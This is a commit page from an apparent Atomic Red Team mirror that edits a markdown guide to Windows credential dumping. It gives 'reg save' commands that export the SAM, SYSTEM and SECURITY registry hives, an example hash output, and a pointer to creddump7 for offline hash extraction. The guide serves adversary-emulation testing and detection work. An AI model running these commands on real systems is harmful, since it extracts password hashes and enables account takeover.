security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update Credential_Dumping.md

Browse Source
This commit is contained in:
Michael Haag
2018-03-21 14:13:10 -04:00
committed by GitHub
parent c3bda067e2
commit e10be818ef
1 changed files with 6 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Windows/Credential_Access/Credential_Dumping.md
+6 -3
View File
@@ -35,16 +35,19 @@ Output:
test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
C:\>
## via Registry
Local SAM (sam & system), cached credentials (system & security) and LSA secrets (system & security) can be enumerated via three registry keys.
## Registry
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys:
Input:
reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
Output:
C:\>reg save HKLM\sam sam
The operation completed successfully.
These hives can be prcossed locally using creddump7 (https://github.com/Neohapsis/creddump7)
These can be processed locally using [creddump7](https://github.com/Neohapsis/creddump7)